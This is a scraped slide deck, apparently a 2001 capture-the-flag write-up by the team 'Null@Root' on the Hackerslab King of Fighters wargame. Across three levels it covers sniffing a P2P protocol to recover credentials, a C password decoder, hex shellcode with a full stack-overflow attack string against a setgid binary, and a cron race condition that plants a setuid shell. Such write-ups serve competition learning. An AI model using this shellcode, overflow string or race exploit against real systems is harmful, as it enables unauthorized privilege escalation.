Download presentation
Presentation is loading. Please wait.
1
King Of Fighters 2001 The Best of Best HackerGroup Null@Root
2
Environment : Zolazola.exe : P2P Communication Program Target : http://kof.hackerslab.org/cgi-bin/level1/idaccess.cgi Level 1 - 1 - 2001/09/06
3
Level 1 (continue) Finding Vulnerability –String from zolazola Executable File ID : guest Password : gZuOeLsAt –Packet sniffing Server : 203.239.xxx.xxx : 2900 Command list – KOFLOG, KOFGETLIST, KOFMESSAGE, KOFGETINFO –KOFOK, KOFFRI, KOFPUTERR KOFPUTINFO - 2 - 2001/09/06
4
Level 1 (continue) KOFLOG guest dXtOfNuEy KOFGTLIST guest KOFOK 0 KOFPUTERR level1 KOFFRI level1 ROFFRI level2 KOFFRI guest KOFMSG guest level1 Hi! are you there? KOFGETINFO guest level1 Client PCServer - 3 - 2001/09/06
5
Level 1 (continue) ATTACK telnet 203.255.xxx.xxx 2900 KOFGETINFO gest guest (I want guest ’ s information.) KOFPUTINFO guest eYuPgOwFz gZuOeLsAt KOFGETLIST level2 (Who is level2 ’ s friend?) KOFFRI kof_moniter KOFGETINFO kof_moniter level2 KOFPUTINFO level2 eDttvdvYQVn level2@kof.hackerslab.org level2user KOFPUTINFO level2 fEuuwewZRWo level2@kof.hackerslab.org level2user KOFPUTINFO level2 gFvvxfx[SXp level2@kof.hackerslab.org level2user KOFPUTINFO level2 eDttvdvYQVn level2@kof.hackerslab.org level2user - 4 - 2001/09/06
6
Level 1 (continue) ENCODE g Z u O e L x A t E Y u P g O w F z -2 – 1 0 +1 +2 +3 +4 +5 +6 g Z u O e L x A t d X t O f N u E y -3 – 2 -1 0 +1 +2 +3 +4 +5 Encode - 5 - 2001/09/06
7
DECODE #include main(int argc, char **argv) { int i, j, start, stop, dy; int src_len; char *src, ch; src = argv[1]; src_len = strlen(src); for(i = 0; i < src_len; i++) { for(j = 0, dy = i; j < src_len; j++, dy--) { ch = *(src + j); printf("%c", ch + dy); } printf("\n"); } Level 1 (continue) Result $./dec1 eDttvdvYQVn eCrqr_pRIMd fDsrs`qSJNe gEtstarTKOf hFutubsULPg iGvuvctVMQh jHwvwduWNRi kIxwxevXOSj lJyxyfwYPTk mKzyzgxZQUl nL{z{hy[RVm oM|{|iz\SWn pN}|}j{]TXo level2 ’ s password - 6 - 2001/09/06
![DECODE #include main(int argc, char **argv) { int i, j, start, stop, dy; int src_len; char *src, ch; src = argv[1]; src_len = strlen(src); for(i = 0; i < src_len; i++) { for(j = 0, dy = i; j < src_len; j++, dy--) { ch = *(src + j); printf( %c , ch + dy); } printf( \n ); } Level 1 (continue) Result $./dec1 eDttvdvYQVn eCrqr_pRIMd fDsrs`qSJNe gEtstarTKOf hFutubsULPg iGvuvctVMQh jHwvwduWNRi kIxwxevXOSj lJyxyfwYPTk mKzyzgxZQUl nL{z{hy[RVm oM|{|iz\SWn pN}|}j{]TXo level2 ’ s password /09/06](http://images.slideplayer.com./24/7351613/slides/slide_7.jpg "DECODE #include main(int argc, char **argv) { int i, j, start, stop, dy; int src_len; char *src, ch; src = argv[1]; src_len = strlen(src); for(i = 0; i < src_len; i++) { for(j = 0, dy = i; j < src_len; j++, dy--) { ch = *(src + j); printf( %c , ch + dy); } printf( \n ); } Level 1 (continue) Result $./dec1 eDttvdvYQVn eCrqr_pRIMd fDsrs`qSJNe gEtstarTKOf hFutubsULPg iGvuvctVMQh jHwvwduWNRi kIxwxevXOSj lJyxyfwYPTk mKzyzgxZQUl nL{z{hy[RVm oM|{|iz\SWn pN}|}j{]TXo level2 ’ s password /09/06")
8
Level 1 (complete) Conguratulations! The IP for the next level is 203.255.xxx.xxx. And ID is h3047. - 7 - 2001/09/06
9
Level 2 Environment Server : Linux kernel 2.4.9 (203.255.xxx.xxx) GCC:egcs-2.91.66 199990314/Linux(egcs- 1.1.2 release) Target : /usr/local/apache/cgi-bin/idaccess.cgi - 8 - 2001/09/06
10
Level 2 (continue) Finding Vulnerability /usr/games directory File list drwxrwxr-x 3 root level2 352256 Aug 25 17:50. drwxr-xr-x 19 root root 4096 Aug 23 22:38.. -rw-rw---- 1 level2 level2 98 Aug 25 17:50 check -rw-r--r-- 1 level2 level2 763 Aug 25 17:50 score -rw-r----- 1 h3579 level2 0 Aug 25 17:50 score.13210 -rwxr-sr-x 1 root level2 17542 Aug 25 06:20 solveit - 9 - 2001/09/06
11
Level 2 (continue) –Solveit work like this : Input ID : (input id --- upto 129byte) (123+456)*789-(456+123)*789 = (Input Result) (nn1+nn2)*nn3-(nn5+nn5)*nn6 = (Input Result) Do you play again(y/n)? (Input Data) 20times - 10 - 2001/09/06
12
Level 2 (continue) Information from Solveit binary file ID Field input length : upto 129byte, start at ebp + 0xffffff78 0x8048d0d : push $0x81 0x8048d12 : lea 0xffffff78(%ebp),%eax 0x8048d18 : push %eax 0x8048d19 : push $0x8049005 0x8048d1e : call 0x8048854 (gdb) x/bs 0x8049005 0x8049005 : "Input your id: " Length start position - 11 - 2001/09/06
13
Level 2 (continue) Last guestion input length is affected by ID Field ’ s last byte 0x8048db7 : mov 0xfffffff8(%ebp),%eax 0x8048dba : push %eax 0x8048dbb : push $0x8049042 0x8048dc0 : call 0x80488c0 0x8048dc5 : add $0x8,%esp (gdb) x/bs 0x8049042 0x8049042 : "Do you play again? (y/n) " get_yn ’ s length - 12 - 2001/09/06
14
Level 2 (continue) Function get_yn use 4byte stack Dump of assembler code for function get_yn: 0x80488c0 : push %ebp 0x80488c1 : mov %esp,%ebp 0x80488c3 : sub $0x4,%esp 0x80488c6 : push $0x4 0x80488c8 : push $0x0 0x80488ca : lea 0xfffffffc(%ebp),%eax 0x80488cd : push %eax 0x80488ce : call 0x8048730 0x80488d3 : add $0xc,%esp 0x80488d6 : mov 0xc(%ebp),%eax 0x80488d9 : push %eax 0x80488da : lea 0xfffffffc(%ebp),%eax 0x80488dd : push %eax 0x80488de : mov 0x8(%ebp),%eax 0x80488e1 : push %eax 0x80488e2 : call 0x8048854 get_yn ’ s stuck (4byte) - 13 - 2001/09/06
15
Level 2 (continue) ATTACK for level2 ’ s gid shell Modify setreuid shell code to setregid shell code ( setreuid(0,0) - setregid(501,501) ) \x31\xdb\x31\xc9\xf7\xe3\x66\x81\xc3\xf5\x01\x66\x81\xc1\xf5 \x01\xb0\x47\xcd\x80\x31\xdb\x31\xc9\x53\x68\x6e\x2f\x73\x68 \x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80 Attack string format [Nop+setregid shell+Nop]+[math quiz answer]+[AAAA][ebp][return Address] 129byte - 14 - 2001/09/06
![Level 2 (continue) ATTACK for level2 ’ s gid shell Modify setreuid shell code to setregid shell code ( setreuid(0,0) - setregid(501,501) ) \x31\xdb\x31\xc9\xf7\xe3\x66\x81\xc3\xf5\x01\x66\x81\xc1\xf5 \x01\xb0\x47\xcd\x80\x31\xdb\x31\xc9\x53\x68\x6e\x2f\x73\x68 \x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80 Attack string format [Nop+setregid shell+Nop]+[math quiz answer]+[AAAA][ebp][return Address] 129byte /09/06](http://images.slideplayer.com./24/7351613/slides/slide_15.jpg "Level 2 (continue) ATTACK for level2 ’ s gid shell Modify setreuid shell code to setregid shell code ( setreuid(0,0) - setregid(501,501) ) \x31\xdb\x31\xc9\xf7\xe3\x66\x81\xc3\xf5\x01\x66\x81\xc1\xf5 \x01\xb0\x47\xcd\x80\x31\xdb\x31\xc9\x53\x68\x6e\x2f\x73\x68 \x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80 Attack string format [Nop+setregid shell+Nop]+[math quiz answer]+[AAAA][ebp][return Address] 129byte /09/06")
16
Level 2 (continue) Attack string (printf "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xdb\x31\xc9\xf7 \xe3\x66\x81\xc3\xf5\x01\x66\x81\xc1\xf5\x01\xb0\x47\xcd\x80\x31\xdb\x31\xc9 \x53\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b \xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x34\x37 \x32\x33\x32\x0a\x39\x37\x34\x37\x35\x0a\x35\x31\x30\x30\x33\x0a\x36\x38\x32 \x32\x30\x0a\x38\x34\x34\x34\x35\x0a\x34\x32\x33\x30\x31\x0a\x34\x34\x39\x35 \x32\x0a\x35\x34\x38\x34\x30\x0a\x37\x35\x31\x31\x30\x0a\x34\x34\x37\x36\x38 \x0a\x31\x33\x30\x39\x32\x32\x0a\x34\x32\x36\x37\x36\x0a\x31\x32\x30\x37\x32 \x30\x0a\x36\x30\x34\x35\x36\x0a\x31\x31\x31\x39\x35\x31\x0a\x31\x30\x36\x38 \x31\x36\x0a\x35\x33\x31\x33\x33\x0a\x38\x35\x31\x38\x31\x0a\x39\x39\x32\x39 \x37\x0a\x38\x32\x34\x35\x37\x0a\x41\x41\x41\x41\x58\xfb\xff\xbf\x40\xfc\xff \xbf\x0a"; cat)|./solveit - 15 - 2001/09/06
17
Level 2 (continue) we could modify main.html of level2 with level2 gid priviledge, but the “ Target ” need level2 uid. Finding other Vulnerability /us2/games/cheek file. sh-2.04$ cat check for file in /usr/games/score.* ; do /bin/cat $file >> /usr/games/score ; /bin/rm -f $file ; done level2 ’ s Cron Job do like this : rm check make check do check - 16 - 2001/09/06
18
Level 2 (continue) ATTACK for level2 ’ s uid shell /var/spool/cron/crontabs/level2 had race condition. Cron rm check make check do check replace check file (include myjob) - 17 - 2001/09/06 (at every 10 min)
19
Level 2 (continue) –Prepared setreuid shell(binary file : /tmp/wsh) main(){ setreuid(501,501); system( “ bin/sh ” ); } –Attack script (filename: exp.sh) echo > /usr/games/check cp /tmp/wsh /tmp/nullroot; chmod 4755 /tmp/nullroot./exp.sh - 18 - 2001/09/06
20
Level 2 (complete) Congraturation!, You passed level 2. Now challenge level 3 system !! level3 system's IP adress is 203.255.xxx.xxx Make your page in /usr/local/apache/htdocs/main.html 귀하의 ID 와 패스워드를 가지고 level3 서버에 telnet 서비스 접속이 가능합니다. level3 시스템의 root 권한을 획득한 후 level3 서버내의 idaccess 라는 프로그램을 실 행시키시오 Now challenge level 3 system !! You can connect level 3 system's telnet service, by using your "Registration Number" and password. You must get a root privilege, and find a excutable file "idaccess" in any location in level 3 system After that, if you excute "idaccess" and input your registration information. then you will get qualification for passing level 3, - 19 - 2001/09/06
21
Level 3 Environment : Server: Solaris 5.8 i386(203.255.xxx.xxx) GCC: 2.9x Target : ?? - 20 - 2001/09/06
22
Level 3 1. Checking vulnerability 1.1 search known bug 1.2 port scan 1.3 search setuid root file 1.4 boot sequence check 2. Found login problem ( 202byte login ID ) attack string format [ serial_no(13) + nop(95)+ shell code(93)+return address(4)] 3. we had not enough time to exploit it, so give up level3.. And defence level2 ’ s homepage. - 21 - 2001/09/06
23
- we worried about p2p on the eve of that game. - level2 was not so easy to solve directly. - there were no special priviledges to keep main.html of level2. - player need some attention for their work, script kiddies copied solveit's exploit from /tmp. - Anybody can get level2's uid by peeking /usr/games/check file. - level3 was difficult to us because we didn't have so much experience Solaris. - we thought all of levels were very nice, thanks to hackerslab. - 22 - 2001/09/06
Similar presentations
